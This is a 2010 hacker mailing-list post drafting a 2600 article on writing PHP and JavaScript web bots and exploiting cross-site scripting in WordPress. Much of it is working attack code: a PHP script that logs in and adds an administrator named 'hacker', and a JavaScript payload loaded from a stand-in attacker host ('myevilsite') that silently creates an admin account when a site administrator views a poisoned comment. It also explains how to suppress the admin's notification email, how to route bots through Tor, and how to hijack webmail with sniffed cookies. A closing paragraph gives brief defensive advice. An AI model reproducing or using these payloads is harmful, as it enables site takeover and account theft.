[Noisebridge-discuss] Coding Bots and Hacking Wordpress

Wed May 26 04:17:47 UTC 2010

Hey Noisebridge, I'm writing an article to submit to 2600 and I'd love
feedback. I've pasted it below. Hopefully it's easy to follow and can
teach people with just basic programming and web development skills
about this stuff.

micah

Coding Bots and Hacking Wordpress

I'm going to explain how to write code that automatically loads web
pages, submits forms, and does sinister stuff, while looking like it's
human. These techniques can be used to exploit cross-site scripting
(XSS) vulnerabilities, download copies of web-based databases, cheat
in web games, and quite a bit more. The languages I'm going to be
using are PHP and Javascript. I'm primarily going to use wordpress as
an example website that I'll be attacking, but that's only because I'm
a fan of wordpress. This stuff will work against any website, as long
as you can find an XSS hole.

The HTTP protocol
=================

Before I dive too deeply into code, it's important to know the basics
of how the web works. It all runs over this protocol called HTTP,
which is a very simple way that web browsers can communicate with web
servers. The browser makes requests, and the server returns some sort
of output based on that. Each time a browser makes an HTTP request, it
includes a lot of header information, and each time the web server
responds, it includes header information as well. Sometimes websites
use HTTPS, which is just HTTP wrapped in a layer of SSL encryption, so
it uses the exact same protocol.

So, here's an example. I just opened up my web browser and went typed
"2600.com" in the address bar and hit enter. Here's the GET request I
sent to the server:

GET / HTTP/1.1
Host: 2600.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;
rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

My web browser was smart enough to figure out the IP address of
2600.com and open up a connection to it on port 80. The first line is
telling the web server I want everything in the root directory (/) of
the web server. The next line is telling it that the host I'm looking
for is 2600.com (sometimes the same web server hosts several different
websites, so the Host header lets the web server know which one you're
interested in). The third line is my user agent string, and this tells
the web server some information about myself. From this one you can
tell that I'm using Firefox 3.6.3 and I'm using Mac OS X 10.6. The
rest of the lines aren't all that important, but you can feel free to
look them up.

A note about the user agent: It normally tells the web server what
operating system and web browser you're using, and web servers use
this information for a bunch of different things. Google Analytics
uses this to give website owners stats about what computers their
visitors use. A lot of websites check to see if the user agent says
you're using an iPhone and an Android phone and then serves up a
mobile version of the website instead of the normal one. And then
there are bots. When google spiders a website to add pages to its
search engine database, it uses the HTTP protocol just like me and
you, but it's user agent string looks something like this instead:
"Googlebot/2.1 (+http://www.google.com/bot.html)". It's ridiculously
easy to spoof your user agent. Try downloading the User Agent Switcher
Firefox extension just to see how easy it is.

After sending that GET request for / to 2600.com, here's the response
my browser got:

HTTP/1.1 301 Moved Permanently
Date: Sat, 22 May 2010 23:02:49 GMT
Location: http://www.2600.com/
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

It returned with a 301 error code, which means it has Moved
Permanently. Other common codes are 200, which means everything is ok,
404, which means File Not Found, and 500, which means Internal Server
Error. The rest of the lines are HTTP headers, but the important one
is the Location header. If my browser gets a Location header in a
response, that means it needs to redirect to there instead. In this
case, loading http://2600.com/ wants me to redirect to
http://www.2600.com/. My browser faithfully complies:

GET / HTTP/1.1
Host: www.2600.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;
rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
[more headers...]

I'm sending another GET request to the server, but this time with the
host as www.2600.com, and it responds:

HTTP/1.1 200 OK
[more headers...]

<html>
<head>
<title>2600: The Hacker Quarterly</title>
<script type="text/javascript" src="nav.js"></script>
<link rel="stylesheet" type="text/css" href="nav.css" />
<link rel="alternate" type="application/rss+xml" title="2600.com RSS
Feed" href="http://www.2600.com/rss.xml">
[more HTML code ...]

To recap, when we try to go to http://2600.com, it redirects to
http://www.2600.com (technically, these are separate domains names and
could be hosting separate sites). Once it returned a 200 OK, it split
out the HTML code of the the website hosted at / on www.2600.com. My
browser sends requests, the server sends responses. That's called
HTTP.

A quick note about cookies
==========================

Cookies are name-value pairs that websites use to save information in
your web browser. One of their main uses is to keep persistent data
about you in an active "session" as you make several requests to the
server. When you login to a website, the only way it knows that you're
still logged in the next time you reload the page is because you send
your cookie back to the website as a line in the headers. You pass
cookies to the web server with the "Cookie:" header, and the web
server sets cookies in your browser with the "Set-Cookie:" header.

This is important to understand because a lot of bots you write might
require you to correctly handle cookies to do what you want,
especially if you want to do something like exploit an XSS bug, make a
social networking worm, or write a script that downloads and stores
everything from someone's web mail account.

Some tools to see wtf is going on
=================================

You rarely actually see what HTTP headers are you're sending to web
servers, and what headers are included in the responses. For writing
this article I used the Firefox extensions Live HTTP Headers and
Tamper Data. Other Firefox extensions that you might find useful are
FireBug and Web Developer Toolbar (useful for cookie management).
Also, Wireshark and tcpdump are great tools for any sort of network
monitoring. And if you're trying this on more complicated sites,
especially ones with lots of ajax, I highly suggest using an
intercepting proxy like Paros or WebScarab.

Start with something simple
===========================

With PHP, the best way to write a web bot is to use the curl
functions. The curl functions to know are curl_init(), curl_setopt(),
curl_exec(), and curl_close(). Here's an example of a simple PHP
script that checks 2600's twitter feed and prints out the latest
tweet. And, just for laughs, we'll pretend to be using IE6 on Windows.

<?php
// get twitter.com/2600, and store it in $output
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'http://twitter.com/2600');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.1)');
$output = curl_exec($ch);
curl_close($ch);

// search through $output for the latest tweet
$start_string = '<span class="entry-content">';
$start = strpos($output, $start_string, 0) + strlen($start_string);
$end = strpos($output, '</span>', $start);
$tweet = substr($output, $start, $end-$start);

// display this tweet to the screen
echo(trim($tweet)."\n");
?>

Go ahead and make a new php file and put this code in it. Run it
either from a web browser (you need to copy it to the web root of a
computer with a web server installed) or the command line (type "php
filename.php", as long as you have php and libcurl installed).
Assuming twitter hasn't changed their layout since I wrote this, it
should print out 2600's latest tweet.

I'll go through it line by line. In the first block of code,
curl_init() gets called and stores a handle to the curl object in the
variable $ch. The next 3 lines of code adds options to this curl
object: the URL of the website it will be loading, that we want
curl_exec to return all the HTML code, and we set a fake user agent
string pretending we're using IE6. The next line of code runs
curl_exec(), which actually sends the HTTP request to
http://twitter.com/2600, and then stores everything returned into
$output. And then the next line, just to be good, closes the curl
object. Now we have all the HTML from that request stored in the
variable $output, as one large string.

The next block of code searches through the returned HTML code for the
first tweet. It uses very common string handling functions: strpos(),
strlen(), and substr(). Every programming language has some of this
stuff built in, and if you're not familiar with these functions I
encourage you to look them up. Basically, this searches $output for
the first occurrence of the string '<span class="entry-content">', and
then the next '</span>' after that, and stores what's between those in
the variable $tweet. I figured this out by going to twitter.com/2600
myself and viewing the source of the page.

And then the final echo() function just prints out $tweet. The trim()
functions strips the whitespace, and then I add a newline at the end
to make the display a little prettier. Pretty cool, huh?

Automatically creating wordpress users
======================================

Now let's do something a little more difficult. Let's login to a
wordpress website (for this example, hosted at
http://localhost/wordpress/) and add a new administrator user. I'll do
this manually first and record the HTTP conversation with the Live
HTTP Headers extension.

POST /wordpress/wp-login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;
rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
[some extra headers...]
Referer: http://localhost/wordpress/wp-login.php
Cookie: wordpress_test_cookie=WP+Cookie+check
Content-Type: application/x-www-form-urlencoded
Content-Length: 116

log=admin&pwd=supersecret&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2F&testcookie=1

This time I sent a POST request (the ones above for 2600.com and
twitter.com were GET requests), and this time I also sent a Referer
header, and a Cookie header. POST and GET are similar, but GET
requests send all the data through the URL, while POST requests send
the data beneath the headers in the POST request. As you can see,
beneath the POST request headers is a URL-encoded string of name-value
pairs. "log" is set to "admin" (which is the username), "pwd" is set
to "supersecret" (which is the password), and then there are other
hidden fields that get sent to: "wp-submit" is "Log In", "redirect_to"
is "http://localhost/wordpress/wp-admin/", and "testcookie" is "1".

And here was the response:

HTTP/1.1 302 Found
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/wordpress/
Set-Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1274755424%7C70045a572d5f43ad9d0fe822683fe7f6;
path=/wordpress/wp-content/plugins; httponly
Set-Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1274755424%7C70045a572d5f43ad9d0fe822683fe7f6;
path=/wordpress/wp-admin; httponly
Set-Cookie: wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1274755424%7C32f9298d9371bbc7f684dafb2ce161bb;
path=/wordpress/; httponly
Location: http://localhost/wordpress/wp-admin/
[and some more headers here too...]

After logging in, the website sets four cookies, and each cookie has a
path. As you can see, two of the cookies have the same name and value,
but different paths. Don't worry about this, the web browser will only
send one copy of this cookie. Now I'm going ahead and adding a new
user called "hacker" with the email address
"hacker at fakeemailaddress.com" and the password "letmein". Here's the
post request:

POST /wordpress/wp-admin/user-new.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;
rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
[more headers...]
Referer: http://localhost/wordpress/wp-admin/user-new.php
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1274758230%7C2fd245efd985716182bf76c2a5d44693;
wordpress_test_cookie=WP+Cookie+check; wp-settings-time-1=1274585390;
wp-settings-1=m6%3Do;
wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1274758230%7C037c433811bd050823ae570f3b3d38d5
Content-Type: application/x-www-form-urlencoded
Content-Length: 236

_wpnonce=07cd245b42&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fuser-new.php&action=adduser&user_login=hacker&first_name=&last_name=&email=hacker%40fakeemailaddress.com&url=&pass1=letmein&pass2=letmein&role=administrator&adduser=Add+User

In order to add a new user, I need to send a POST request to
/wordpress/wp-admin/user-new.php. I need to pass along a cookie string
with the cookies that were set earlier. The data for the POST request
needs to include these fields: "_wpnonce", "_wp_http_referer",
"action", "user_login", "first_name", "last_name", "email", "url",
"pass1", "pass2", "role", and "adduser" (although several of the
values are blank).

The first field, _wpnonce, is going to cause a problem. That's there
specifically to prevent people like me from doing things like this.
The value is "07cd245b42", but how are we supposed to know that? If I
look at the source code of the add user page, it contains this: <input
type="hidden" id="_wpnonce" name="_wpnonce" value="07cd245b42" />

To get that value, we'll just need to send a GET request to
/wordpress/wp-admin/user-new.php first, search through its HTML for
the hidden field called "_wpnonce", and then submit the form with that
value. Here's a PHP script that does all of that:

<?php
// set the url of the wordpress site to do this on
$wp_url = 'http://localhost/wordpress';

// this will only work if we already have a username and password
$username = 'admin';
$password = 'supersecret';

// set the username, password, and email of the new user we will create
$new_username = 'hacker';
$new_password = 'letmein';
$new_email = 'hacker at fakeemailaddress.com';

// make up a user agent to use, lets say IE6 again
$user_agent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)';

// start by logging into wordpress (using POST, not GET)
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url.'/wp-login.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
'log='.urlencode($username).'&pwd='.urlencode($password).'&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2F&testcookie=1');
curl_setopt($ch, CURLOPT_REFERER, $wp_url.'/wp-login.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
$output = curl_exec($ch);
curl_close($ch);

// search $output for the four cookies, add them to an array
$index = 0;
$cookieStrings = array();
for($i=0; $i<4; $i++) {
    $start_string = 'Set-Cookie: ';
    $start = strpos($output, $start_string, $index) + strlen($start_string);
    $end_string = ';';
    $end = strpos($output, $end_string, $start);
    $cookieStrings[] = substr($output, $start, $end-$start);
    $index = $end + strlen($end);
}

// turn cookies into a single cookie string (skipping 4rd cookie,
since it's the same as 2nd)
$cookie = $cookieStrings[0].'; '.$cookieStrings[1].'; '.$cookieStrings[3];

// load the add user page
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url.'/wp-admin/user-new.php');
curl_setopt($ch, CURLOPT_REFERER, $wp_url.'/wp-admin/');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
$output = curl_exec($ch);
curl_close($ch);

// search for _wpnonce hidden field value
$start_string = '<input type="hidden" id="_wpnonce" name="_wpnonce" value="';
$start = strpos($output, $start_string, 0) + strlen($start_string);
$end_string = '" />';
$end = strpos($output, $end_string, $start);
$_wpnonce = substr($output, $start, $end-$start);

// add our new user
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url.'/wp-admin/user-new.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
'_wpnonce='.urlencode($_wpnonce).'&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fuser-new.php&action=adduser&user_login='.urlencode($new_username).'&first_name=&last_name=&email='.urlencode($new_email).'&url=&pass1='.urlencode($new_password).'&pass2='.urlencode($new_password).'&role=administrator&adduser=Add+User');
curl_setopt($ch, CURLOPT_REFERER, $wp_url.'/wp-admin/user-new.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
$output = curl_exec($ch);
curl_close($ch);
?>

This little piece of code totally works (with wordpress 2.9.2 anyway).
Change the $wp_url, $username, and $password to a wordpress site you
control, and run it. Go look at your wordpress users. You'll have a
new administrator user called "hacker".

Thoughts on PHP bots
====================

Using PHP and curl, you can write a bot that can do (almost) anything
a human can do, as long as you're able to do it by hand first and see
what the HTTP headers look like. And since it's a bot, it's simple to
run it, say, 150000 times in a row, or to run it once every 5 minutes
until you want to stop it.

What if you want to be anonymous? It's easy to use curl through a
proxy server, and in fact you can even use curl through the Tor
network (though it will be much slower). Just look up the docs for
curl_setopt() to find out how.

I mentioned writing bots that can download and store all the email in
a webmail account. Well, webmail uses HTTP, which means it uses
cookies to keep track of active sessions. It's totally feasible to
write a PHP script that, given a cookie string for someone's Yahoo!
mail account (which you can get by sniffing traffic on a public wifi
network), can download and store all of their email as long they don't
log out before your script is done running.

These are all things you can do with PHP, or with any other
server-side language like Ruby, Python, Perl, or C. But Javascript on
the other hand runs in web browsers, and you can get other people
(like admins or other users of websites you're trying to hack) to run
your code in their browsers if you exploit an XSS bug.

What is XSS?
============

An XSS bug is where you can submit information that includes
Javascript code to a website, that gets displayed back to users of
that website. So, for example, maybe your First Name is 'Bob', and
your Last Name '<script>alert(0)</script>'. If, after you submit this
form, it says your first name is 'Bob' and it pops up an alert box
that says 0, that means you've found an XSS bug. If someone else goes
to your profile page, it will pop up an alert box for them that says 0
too.

Popping up an alert box is harmless enough, but with the power of
ajax, you can do a lot more sinister stuff. Admins often have the
ability to add new users to websites. If an admin stumbles upon your
profile where the Last Name field actually contains Javascript, that
code could silently add yourself as an admin user on the site, and
even alert you that this has happened so you can login, escalate
privileges to command execution on their server, and cover your
tracks.

People use ajax as a buzzword to mean any sort of fancy Javascript.
Really, all ajax is is the ability for Javascript to make its own HTTP
requests and retrieve the responses, similar to the curl library in
PHP.

The wordpress XSS payload
=========================

The PHP script that added a new user is a good start, but it's not
very useful for hacking websites. You need to already have access!
With XSS, you trick someone else who does have access to run it for
you. Pretend with me that there's an XSS bug in the comment form in
wordpress. You can post a comment and include Javascript code that
will then get executed whenever anyone loads the page. You post a
comment that says:

Good point! And all the other commentors are a bunch of trolls!
<script src=http://myevilsite/hack.js></script>

Whenever anyone loads this page, it executes http://myevilsite/hack.js
on your site. Here's what's in hack.js:

// setup
var wp_url = 'http://localhost/wordpress';
var new_username = 'hacker';
var new_password = 'letmein';
var new_email = 'hacker at fakeemailaddress.com';

// create an ajax object and return it
function ajaxObject() {
    var http;
    if(window.XMLHttpRequest) { http=new XMLHttpRequest(); }
    else{ http=new ActiveXObject("Microsoft.XMLHTTP"); }
    return http;
}

// load the user page
var http1 = ajaxObject();
http1.open("GET",wp_url+"/wp-admin/user-new.php",true);
http1.onreadystatechange = function() {
    if(http1.readyState != 4)
        return;

    // search for _wpnonce hidden field value
    var start_string = '<input type="hidden" id="_wpnonce"
name="_wpnonce" value="';
    var start = http1.responseText.indexOf(start_string, 0) +
start_string.length;
    var end_string = '" />';
    var end = http1.responseText.indexOf(end_string, start);
    var _wpnonce = http1.responseText.substring(start,end);

    // add out new user
    var http2 = ajaxObject();
    http2.open("POST",wp_url+"/wp-admin/user-new.php",true);
    http2.setRequestHeader("Content-type","application/x-www-form-urlencoded");
    http2.send('_wpnonce='+escape(_wpnonce)+'&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fuser-new.php&action=adduser&user_login='+escape(new_username)+'&first_name=&last_name=&email='+escape(new_email)+'&url=&pass1='+escape(new_password)+'&pass2='+escape(new_password)+'&role=administrator&adduser=Add+User');
}
http1.send();

If an admin loads this page, a new administrator user called "hacker"
will silently get created. If you want to test this out on a wordpress
site you control, go ahead and upload this script as hack.js
somewhere, and include it in a post (by editing the post in HTML
mode). Make sure you delete the "hacker" user first if it's already
there. Then, while you're logged in, load the post page, and go check
to see what wordpress users your site has. There will be a new one.

This particular script could be improved in a couple of ways. For
example, you can check to see if the user is logged into wordpress
first before trying to add a new user (there will be a lot more
traffic in the logs if each and every visitor sends extra requests to
wp-admin/user-add.php). Also, by default wordpress sends an email to
the administrator of the site when a new user account gets created, so
really this won't be silent at all. To get around this, you can have
the script first load the wordpress settings page to see what the
admin email address is set to, then post the form to change the email
address to your own email address, then add a new user, then submit
the settings form again to change the email address back. In this way,
the real admin would never get an email about it, and you would
instead.

It might take a week for the admin to get around to running your code,
it might just take a day, or they might never run it. If you want to
be alerted when it happens, you can use ajax to do that too. Make a
page on a website you control (say, http://myevilsite/alert.php) that
sends you an email when it gets loaded. Then make the ajax GET that
script when it gets executed, and you'll get an email when your new
account is created. If you're creative, the possibilities are endless.

There are two ways to protect your websites against automated web bots
and crazy XSS attacks. First, the only way to defeat bots is to
include some sort of CAPTCHA (those annoying images with skewed
letters you need to retype). Make sure it actually works -- I've seen
forms with CAPTCHAs that still work fine if you ignore the CAPTCHA
field. You're CAPTCHA doesn't have to be skewed letters, but it does
have to be annoying. All it is is a simple Turing test, something
that's easy for humans to answer but hard/impossible for computers,
which means you'll have to test your users before they can continue if
it's important to you to thwart bots. And finally, fix all your XSS
holes! XSS gets dismissed as a lowly not-very-harmful vulnerability
because "so what if someone pops up an alert box?". Hopefully this
article will show you that it's a bit more dangerous than that.